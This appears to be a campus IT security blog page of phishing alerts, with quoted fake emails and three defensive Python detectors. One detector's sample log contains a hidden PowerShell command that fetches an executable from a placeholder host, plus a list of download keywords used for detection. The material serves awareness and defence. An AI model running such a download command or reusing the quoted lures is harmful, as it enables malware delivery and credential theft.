Uber Data Breach

From Airplane, 1980

Dunn: Uh, Captain, I’m picking up an overheat in the computer core.
Clarence Oveur: How serious is it, Mr. Dunn?
Dunn: Uh, I can’t tell sir.
Clarence Oveur: Well you can tell me – I’m the Captain

What possible relevance could this quote have? Well… Uber, the ride company, had a massive data breach a year ago and evidently did not disclose the situation.

“Bloomberg was first to report that hackers stole the personal data of 57 million customers and drivers from Uber, a massive breach that the company concealed for more than a year. Finally, this week, they fired their chief security officer and one of his deputies for their roles in keeping the hack under wraps, which included a $100,000 payment to the attackers to “delete the data”.”

So that’s kind of serious. (The fine art of understatement.)

Suffice it to say that if you get email that references your Uber account, don’t click on the links.

[Phishing Alert] Fake Message from Facebook Security Stating You Violated a Policy

From Facecrooks.com (Hint: if you have ANYONE friended on Facebook, make sure you add Facecrooks to your list!):

“Be on the lookout for the following bogus Facebook message from Facebook Security or “Faćebøøĸ Sẻƈurîƚy” as it is commonly displayed. Obviously, we aren’t talking about the real Facebook Security here. It is a phishing attempt to gain access to Facebook user accounts:

The Facebook message looks something like this:

Your account is reported to have violated a policy that is considered disruptive or insulting Facebook users. Until we http://www.facebook.com/security system will deactivate your account within 12 hours after you open this message if you do not confirm such reproductions.

Please confirm your facebook account below:

If you still want to use your account, please confirm your facebook account below:

(If the link is not clickable, try copy it into your browser.)

Note: we recommend to facebook users, asked to filling data that are complete and very accurate because we are from http://www.facebook.com/security team can ensure that the ownership of the account actually exists in your control and no that is using your Facebook account without permission.

Facebook Security ™

Another popular message is shown below:

WARNING : Your account is reported to have violated the policies that are considered annoying or insulting Facebook users.system will disable your account within 24 hours if you do not do the reconfirmation.

Notice how the scammers are using the authentic link to Facebook Security to make the ruse appear more legit. One BIG, red flag is that the verification link is to a third party Facebook application. We tried to follow the link, but this particular application has been removed by Facebook. You can be sure there are others that are active and in use.

[ALERT] This Scary New Phishing Attack Is Very Hard to Detect

For the purposes of expediency, I am simply going to paste in the article from knowbe4.com for you; the full article is available on the KnowBe4 site.

“You need to know about a new phishing attack vector reported by our friends at Barkly. It utilizes a new technique that’s just plain nasty.

This week, users at one of their customers began receiving emails from known contacts they had at another organization. In the screenshot below you can see that at least one of the emails appeared to be a reply to an existing email thread, where users at the two organizations had been emailing back and forth.

The new message was noticeably short — “Morning, please see attached and confirm” (you probably see where this is going) — but in the context of the email chain it was very convincing. The email appears to come from a person at a company the receiver has been emailing with, and this message appears to be a reply to a legit email chain. Yikes.

The aim was to have the user open the Word attachment, and follow instructions to enable macros.

Technical background of the attack

The user on the other end had been infected with a new variant of Ursnif, one of the most active and widespread banking Trojans in the world.

Investigation showed that the Word doc the user downloaded contained a macro that, when activated, launched a PowerShell script designed to download the Ursnif payload.

Ursnif is a powerful trojan with a lot of features like stealing victim credentials in a variety of ways via man-in-the-browser attacks, keylogging, screenshot capture, etc.

It looks like the evil masterminds behind Ursnif are now taking it one step further and using the compromised email accounts of its victims to spread the infection like a worm.

It’s turning infected workstations into spam factories

What makes this social engineering attack so tricky is that the email pictured above wasn’t just coming from an organization the recipient knew and had been emailing with, it came as a reply to an existing email chain. That is a hard one for a user not to fall for; they really need to be on their toes to catch this one.

Ursnif isn’t the only trojan we’ve seen hijacking victim email accounts. In July, we saw the Emotet trojan doing something similar.

Now, compromised accounts have been a thing since email has been around, so getting an infected email from a trusted source is nothing new, but if this is becoming a larger trend it is even more important to mitigate before your own network starts spewing out malicious attacks and your mail server gets on blacklists.”
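The chain the article describes (Word document, macro, PowerShell, download) leaves a very recognizable trace on the workstation: an Office application starting a script host. The following is an added example of that detection logic, not code from KnowBe4, Barkly or Pomona ITS. The log lines are constructed for this post in a simple `timestamp|key=value` layout rather than any real Sysmon or EDR format, and the hosts, users, paths and URL in them are placeholders.

```python
import re

# Parents that should almost never spawn a script host on a user's PC.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script/command hosts a macro typically launches.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Download primitives that raise a medium hit to high; hand-picked, not exhaustive.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|start-bitstransfer|net\.webclient", re.I
)

# Constructed process-creation events (hypothetical host names, users, paths and URL).
SAMPLE_LOG = [
    r"2017-11-08T10:52:13Z|host=LIB-PC-07|user=jdoe|parent=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell.exe -NoProfile -WindowStyle Hidden -Command (New-Object Net.WebClient).DownloadFile('http://example.invalid/update.bin','C:\Users\jdoe\AppData\Local\Temp\update.exe')",
    r"2017-11-08T11:03:40Z|host=LIB-PC-07|user=jdoe|parent=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell.exe -Command Get-Date",
    r"2017-11-08T11:10:02Z|host=ITS-ADMIN-02|user=svc_inventory|parent=C:\Windows\explorer.exe|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell.exe -File C:\scripts\inventory.ps1",
    r"2017-11-08T11:15:55Z|host=LIB-PC-07|user=jdoe|parent=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|image=C:\Windows\splwow64.exe|cmd=splwow64.exe 12288",
]

def parse_event(line):
    """Split one 'ts|key=value|key=value' line into a dict."""
    ts, _, rest = line.partition("|")
    event = {"ts": ts}
    for field in rest.split("|"):
        key, _, value = field.partition("=")
        event[key] = value
    return event

def image_name(path):
    """Last component of a Windows path, lower-cased, for set membership tests."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return 'high', 'medium' or None for one process-creation event."""
    parent = image_name(event.get("parent", ""))
    child = image_name(event.get("image", ""))
    if parent not in OFFICE_APPS or child not in SCRIPT_HOSTS:
        return None                 # printing helpers, admin scripts etc. are not of interest
    if DOWNLOAD_RE.search(event.get("cmd", "")):
        return "high"               # Office -> script host that also fetches something
    return "medium"                 # Office -> script host with no obvious download: still rare

def scan(lines):
    """Return (timestamp, host, user, severity) for every event that matches."""
    hits = []
    for line in lines:
        event = parse_event(line)
        severity = classify(event)
        if severity:
            hits.append((event["ts"], event.get("host"), event.get("user"), severity))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

The rule keys on the parent/child relationship first and only then on the command line, so the second sample line (Word spawning PowerShell with nothing suspicious in the arguments) is still surfaced, while the administrator's script launched from Explorer is ignored even though it looks similar. The download keywords are a small, easily evaded list; they rank hits, they do not decide them.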

While Pomona has a team and ITS is a team, this is not a Pomona team


Some of you have reported receiving the following email:

—–Original Message—–
From: Pomona Team [mailto:lunar@cybermesa.com]
Sent: Wednesday, November 08, 2017 10:41 AM
Subject: © 2017 Pomona Upgrade

Pomona College in Claremont, California
Remote Webmail Service
Information Systems & Services:
Click bellow link to upgrade
© 2017 Pomona Upgrade

Well, most of you have determined that it stinks like three day old phish.

Let’s see . . . where to begin:

The Sender is listed as “lunar@cybermesa.com”.
The Subject is “copyright symbol Pomona Upgrade”
The spelling in the body of the email is even worse than my usual spelling.
The link in the body of the email is completely unrelated to Pomona College.

So, if you see something from “Pomona Team” and it’s not related to football, ballroom dance, the ITS team, or many other teams with which you might already be familiar, just delete!
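The four tells listed above (sender address, subject, wording, link) can be checked mechanically before a human ever reads the message. What follows is an added example of such a checker, written for this post and not a Pomona ITS tool. The sample messages are constructed from the text quoted in this post; since the post does not reproduce the actual link targets, `example.invalid` stands in for them, and the legitimate sample's addresses are made up. It also covers the "To: is the same as From:" pattern of the "Technical Support" messages elsewhere on this page, which hides the real recipients in Bcc.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

ORG_DOMAIN = "pomona.edu"          # the domain the phish pretends to speak for
ORG_KEYWORDS = ("pomona", "its")   # display-name words that claim affiliation

URL_RE = re.compile(r"https?://[^\s<>\"')]+", re.I)
# Lure phrases taken from the messages quoted in this post (hand-picked, not exhaustive).
LURE_RE = re.compile(
    r"\b(?:upgrade|verif\w*|suspen\w*|deactivat\w*|placed on hold|confirm your|within \d+ hours)",
    re.I,
)

def _same_org(host, org):
    host = (host or "").lower().rstrip(".")
    return host == org or host.endswith("." + org)

def _body_text(msg):
    if msg.is_multipart():
        parts = [p.get_payload(decode=True).decode("utf-8", "replace")
                 for p in msg.walk() if p.get_content_type() == "text/plain"]
        return "\n".join(parts)
    return msg.get_payload()

def red_flags(raw_message, org_domain=ORG_DOMAIN, org_keywords=ORG_KEYWORDS):
    """Return a list of (code, detail) red flags for one RFC 822 message string."""
    msg = message_from_string(raw_message)
    flags = []
    name, addr = parseaddr(msg.get("From", ""))
    from_domain = addr.rpartition("@")[2]
    # 1. Display name claims the org, but the address belongs to someone else.
    claims_org = any(re.search(rf"\b{k}\b", name, re.I) for k in org_keywords)
    if claims_org and not _same_org(from_domain, org_domain):
        flags.append(("sender-domain", f"'{name}' claims {org_domain} but sends from {addr}"))
    # 2. Message addressed to the sender itself; the real targets are hidden in Bcc.
    _, to_addr = parseaddr(msg.get("To", ""))
    if to_addr and to_addr.lower() == addr.lower():
        flags.append(("self-addressed", f"To: and From: are both {addr}"))
    # 3. Urgency or account-action language in subject or body.
    body = _body_text(msg)
    lures = sorted({m.lower() for m in LURE_RE.findall(msg.get("Subject", "") + "\n" + body)})
    if lures:
        flags.append(("lure-language", ", ".join(lures)))
    # 4. Links that do not point at the org the message claims to come from.
    for url in URL_RE.findall(body):
        host = urlparse(url).hostname
        if not _same_org(host, org_domain):
            flags.append(("offsite-link", f"{url} points at host {host}"))
    return flags

# Constructed samples; "(c)" stands for the copyright symbol in the real subject.
POMONA_SAMPLE = """\
From: Pomona Team <lunar@cybermesa.com>
Subject: (c) 2017 Pomona Upgrade
Content-Type: text/plain

Pomona College in Claremont, California
Remote Webmail Service
Information Systems & Services:
Click bellow link to upgrade
http://example.invalid/pomona-upgrade
"""

SUPPORT_SAMPLE = """\
From: "Khaireeman Shah Aman Shah (FKPSB)" <khaireeman.as@feldaglobal.com>
To: "Khaireeman Shah Aman Shah (FKPSB)" <khaireeman.as@feldaglobal.com>
Subject: RE: Technical Support
Content-Type: text/plain

A few of your incoming mails were placed on hold, in order to receive your
messages kindly CLICK-HERE: http://example.invalid/release-mail
"""

LEGIT_SAMPLE = """\
From: ITS Help Desk <helpdesk@pomona.edu>
To: jdoe@pomona.edu
Subject: October ITS newsletter
Content-Type: text/plain

This month's newsletter is posted at https://its.pomona.edu/news/october
"""

if __name__ == "__main__":
    for label, sample in (("Pomona Team", POMONA_SAMPLE),
                          ("Technical Support", SUPPORT_SAMPLE),
                          ("legitimate", LEGIT_SAMPLE)):
        print(label, red_flags(sample) or "no red flags")
```

None of these checks is decisive alone: a real ITS announcement may well say "upgrade", and a newsletter may link to a vendor's site. The combination is what matters, and the "display name claims us but the address does not" check is the one that a mail gateway can enforce outright.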


Netflix Scam! Think before you click!

There is a massive scam campaign going on, this time a very well-executed Netflix phishing attack.

The scam targets subscribers telling them that their account is about to be canceled. The well-designed, personalized fake email convinces customers to update their account information to avoid suspension. This results in stolen personal and credit card information.

The email has the subject line “Your suspension notification” and includes a link where the subscriber is taken to a fake Netflix page which requires their log-in information as well as credit card number.

The scam was detected Sunday and it targets nearly 110 million Netflix subscribers. The fake site includes Netflix’s logo as well as popular Netflix shows like “The Crown” and “House of Cards” to make it seem legitimate.

When is “technical support” NOT “technical support”?

Answer: when it is unasked for!

Like manna from heaven, Khaireeman Shah Aman Shah sent a helpful email which informs the recipient that ALAS some of his emails were placed on hold. WELL, gosh darn it all. We really apologize for that one, oh goofy us. Just click here and all will be just as it should be… that is, your identity will have been stolen.

If you receive the following email, please delete it. DO NOT CLICK where it tells you to CLICK!

From: Khaireeman Shah Aman Shah (FKPSB) [mailto:khaireeman.as@feldaglobal.com]
Sent: Friday, November 3, 2017 2:43 PM
To: Khaireeman Shah Aman Shah (FKPSB)
Subject: RE: Technical Support

A few of your incoming mails were placed on hold, in order to receive your messages kindly CLICK-HERE. We apologize for any inconveniences this process may have caused you and we appreciate your understanding.

You heard it here: “Almost too obvious to report”

Several of you have received the following email which is a complete phish. Please delete the email. It is not only a lie, it is a false lie! (A reference from “The King and I” by Rodgers and Hammerstein and a flashback to my days on stage.)

From: Khaireeman Shah Aman Shah (FKPSB) [mailto:khaireeman.as@feldaglobal.com]
Sent: Thursday, October 19, 2017 7:15 AM
To: Khaireeman Shah Aman Shah (FKPSB)
Subject: RE: Technical Support

Your account could not be automatically upgraded to the new Outlook Web App(OWA) 14.0.03. Kindly upgrade manually by visiting our UPGRADE-PAGE to avoid account deactivation.

This is doubly offensive as we are indeed going to upgrade our campus email system and we will be sending emails out from time to time about actions you may need to take. So this really does increase the workload and the worryload.

But, that’s my problem, not yours.

Just delete this email and, before I send you something similar, I will send you a notice that I’m going to send you a notice.

Beware Emails with Dropbox Links

There are quite a few variations of Dropbox phishing emails that we’ve seen. They normally tell you that there are documents available for you to download and they often look genuine. This one even has a disclaimer footer on the email.

Please, unless you know who sent it and you have verified with that person that they have sent it, just delete the email.

Just saw this one come out of the ether:

From: Dropbox̣ [notificationsonline@dropbox̣-online.com] [mailto:ave@dfakto.com]
Sent: Monday, October 16, 2017 9:19 AM
Subject: Documents Received – (2) Via Dropbox

You have new documents sent you to you via dropbox̣

182.7 KB Scanned_Invoice1392.Pdf

159.kb Investmentdetails0130.Pdf

View Documents
Download Documents

– The Dropbox̣ Team

+32 474905485
+32 2 290 63 95

Success factors for a successful transformation
This message contains confidential information and is intended only for the intended recipients. If you are not an intended recipient you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. E-mail transmission cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain viruses. The sender therefore does not accept liability for any errors or omissions in the contents of this message, which arise as a result of e-mail transmission. If verification is required please request a hard-copy version.
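Both the "Dropbox̣" sender above and the "Faćebøøĸ Sẻƈurîƚy" name in the Facebook alert earlier on this page rely on the same trick: letters that look like the brand's but are different Unicode characters, so a naive string comparison with "Dropbox" fails. This added example (not Dropbox's, Facebook's or Pomona's code) reduces a display name or domain to an ASCII "skeleton" and compares that against a short list of brands. The two spoofed names are rebuilt with escapes from the text quoted in this post; the brand list, the brand-to-domain table and the confusables map are small hand-built assumptions for the example, not the full Unicode confusables data. The domain check also catches plain-ASCII look-alikes such as `dropbox-online.com`, which goes beyond the Unicode case the quoted message shows.

```python
import unicodedata

# Brands the campus expects mail from (plain ASCII, lower-case). Constructed list.
KNOWN_BRANDS = ("dropbox", "facebook", "netflix", "pomona")
# Domains those brands really send from; assumed for this example.
BRAND_DOMAINS = {"dropbox": "dropbox.com", "facebook": "facebook.com"}
# Letters that NFKD does not decompose to a Latin base but that read as one.
# Hand-built from the spoofed names quoted in this post ("ƚ" stands in for "t" there).
CONFUSABLES = {"ø": "o", "ĸ": "k", "ƈ": "c", "ƚ": "t", "ı": "i", "ł": "l", "đ": "d"}

def skeleton(text):
    """Collapse accents, combining marks and look-alike letters to lower-case ASCII."""
    out = []
    for ch in unicodedata.normalize("NFKD", text.lower()):
        if unicodedata.combining(ch):
            continue                         # e.g. the dot below the x in the spoofed "Dropbox"
        out.append(CONFUSABLES.get(ch, ch))
    return "".join(out)

def spoofed_brand(display_name):
    """Return the brand a non-ASCII display name imitates, or None."""
    if display_name.isascii():
        return None                          # nothing to unmask; a plain-ASCII name is judged by its domain
    skel = skeleton(display_name)
    return next((brand for brand in KNOWN_BRANDS if brand in skel), None)

def lookalike_domain(address):
    """Return the brand whose domain the sender address imitates without being it, or None."""
    domain = address.rpartition("@")[2].lower().rstrip(".")
    skel = skeleton(domain)
    for brand, real in BRAND_DOMAINS.items():
        if brand in skel and skel != real and not skel.endswith("." + real):
            return brand
    return None

# Spoofed names reconstructed with escapes from the messages quoted in this post.
FAKE_DROPBOX = "Dropbox\u0323"               # "Dropbox" followed by COMBINING DOT BELOW
FAKE_FACEBOOK = "Fa\u0107eb\u00f8\u00f8\u0138 S\u1ebb\u0188ur\u00ee\u019ay"
FAKE_DROPBOX_ADDR = "notificationsonline@dropbox\u0323-online.com"

if __name__ == "__main__":
    for name in (FAKE_DROPBOX, FAKE_FACEBOOK, "Dropbox"):
        print(repr(name), "->", skeleton(name), "| imitates:", spoofed_brand(name))
    for addr in (FAKE_DROPBOX_ADDR, "ave@dfakto.com", "no-reply@dropbox.com"):
        print(addr, "| look-alike of:", lookalike_domain(addr))
```

The skeleton is deliberately lossy: it exists to make the spoofed name collide with the genuine one, after which the ordinary checks (does the address really belong to that brand?) take over. Note that the quoted Dropbox message also carries a second, unrelated `mailto:` address, which the domain check alone would not flag; the display name is what gives it away.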

iTunes Spearphishing Scam! Beware!


One of you just reported that you had received an email from someone at work here that looks something like the following:

Sent: Tuesday, October 3, 2017 9:03 AM
Subject: Itunes Gift Card

Hi ,
Can you help me arrange 10pieces of $100 iTunes gift cards.
Total of $1,000.
I need it urgently within today.
I will tell you more information about where it should be posted later.


If you have responded to this email, please go to mypassword.pomona.edu and change your password.